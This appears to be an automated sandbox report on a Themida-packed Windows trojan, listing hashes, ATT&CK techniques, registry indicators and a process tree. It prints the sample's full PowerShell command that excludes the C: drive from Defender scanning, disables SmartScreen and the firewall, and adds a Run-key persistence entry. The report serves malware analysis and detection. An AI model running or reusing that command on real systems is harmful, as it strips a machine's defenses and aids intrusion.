550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80

General

Target

550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
Size

3.5MB
MD5

57324b12506033d137a0ad82d2499c81
SHA1

6664dda28b289251ab23f16f7955f97978208fa7
SHA256

550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80
SHA512

d514ff8dda74f4af8645ab950b3ff6bd4e0a9432b9614a9fef4953a56b2bbd6535556ef9b6129df1099b7c93cafb682ad50db773ea6bc7db48279165b67fe2d1

Score

10^/10

evasion persistence themida trojan

Malware Config

Signatures

Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Modify Existing Service
T1031

Processes:

powershell.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Start = "4" powershell.exe
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
Modifies Windows Firewall 1 TTPs 1 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exe

pid process

540 netsh.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Start = "4"	powershell.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe

pid	process
540	netsh.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe

Drops startup file 1 IoCs

Processes:

550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe

Loads dropped DLL 1 IoCs

Processes:

550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe

pid process

1744 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe

Themida packer 6 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral1/memory/1744-54-0x000000013F100000-0x000000013FA5E000-memory.dmp	themida
behavioral1/memory/1744-55-0x000000013F100000-0x000000013FA5E000-memory.dmp	themida
behavioral1/memory/1744-56-0x000000013F100000-0x000000013FA5E000-memory.dmp	themida
behavioral1/memory/1744-58-0x000000013F100000-0x000000013FA5E000-memory.dmp	themida
behavioral1/memory/1744-60-0x000000013F100000-0x000000013FA5E000-memory.dmp	themida
\ProgramData\MicrosoftNetwork\System.exe	themida

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinNet = "C:\\ProgramData\\MicrosoftNetwork\\System.exe"	powershell.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe

pid process

1744 550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 0f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 19000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a92000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exepowershell.exe

pid	process
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1552	powershell.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1552 powershell.exe

description	pid	process
Token: SeDebugPrivilege	1552	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exepowershell.exe

description	pid	process	target process
PID 1744 wrote to memory of 1552	1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe	powershell.exe
PID 1744 wrote to memory of 1552	1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe	powershell.exe
PID 1744 wrote to memory of 1552	1744	550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe	powershell.exe
PID 1552 wrote to memory of 540	1552	powershell.exe	netsh.exe
PID 1552 wrote to memory of 540	1552	powershell.exe	netsh.exe
PID 1552 wrote to memory of 540	1552	powershell.exe	netsh.exe

C:\Users\Admin\AppData\Local\Temp\550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe
"C:\Users\Admin\AppData\Local\Temp\550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Drops startup file
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1744

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
2⤵
- Modifies security service
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1552

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
3⤵
- Modifies Windows Firewall
PID:540

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

2

T1031

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

3

T1112

Virtualization/Sandbox Evasion

1

T1497

Install Root Certificate

1

T1130

Credential Access

Discovery

Query Registry

2

T1012

Virtualization/Sandbox Evasion

1

T1497

System Information Discovery

3

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

\ProgramData\MicrosoftNetwork\System.exe
Filesize
3.5MB

MD5
57324b12506033d137a0ad82d2499c81

SHA1
6664dda28b289251ab23f16f7955f97978208fa7

SHA256
550edaa6fb64a4a7eec8c2bd26dbde31a9cf47247e092dcfa0cf1c1f5fd5ec80

SHA512
d514ff8dda74f4af8645ab950b3ff6bd4e0a9432b9614a9fef4953a56b2bbd6535556ef9b6129df1099b7c93cafb682ad50db773ea6bc7db48279165b67fe2d1

Download Submit
memory/540-70-0x0000000000000000-mapping.dmp

Download
memory/1552-64-0x000007FEF44A0000-0x000007FEF4EC3000-memory.dmp

Filesize
10.1MB

Download
memory/1552-73-0x000000000284B000-0x000000000286A000-memory.dmp

Filesize
124KB

Download
memory/1552-72-0x0000000002844000-0x0000000002847000-memory.dmp

Filesize
12KB

Download
memory/1552-69-0x000000001B790000-0x000000001BA8F000-memory.dmp

Filesize
3.0MB

Download
memory/1552-65-0x000007FEF3940000-0x000007FEF449D000-memory.dmp

Filesize
11.4MB

Download
memory/1552-67-0x0000000002844000-0x0000000002847000-memory.dmp

Filesize
12KB

Download
memory/1552-62-0x0000000000000000-mapping.dmp

Download
memory/1744-58-0x000000013F100000-0x000000013FA5E000-memory.dmp

Filesize
9.4MB

Download
memory/1744-61-0x0000000077650000-0x00000000777F9000-memory.dmp

Filesize
1.7MB

Download
memory/1744-60-0x000000013F100000-0x000000013FA5E000-memory.dmp

Filesize
9.4MB

Download
memory/1744-68-0x0000000000830000-0x0000000000840000-memory.dmp

Filesize
64KB

Download
memory/1744-59-0x000007FEFC071000-0x000007FEFC073000-memory.dmp

Filesize
8KB

Download
memory/1744-54-0x000000013F100000-0x000000013FA5E000-memory.dmp

Filesize
9.4MB

Download
memory/1744-57-0x0000000077650000-0x00000000777F9000-memory.dmp

Filesize
1.7MB

Download
memory/1744-56-0x000000013F100000-0x000000013FA5E000-memory.dmp

Filesize
9.4MB

Download
memory/1744-55-0x000000013F100000-0x000000013FA5E000-memory.dmp

Filesize
9.4MB

Download
memory/1744-74-0x0000000000830000-0x0000000000840000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads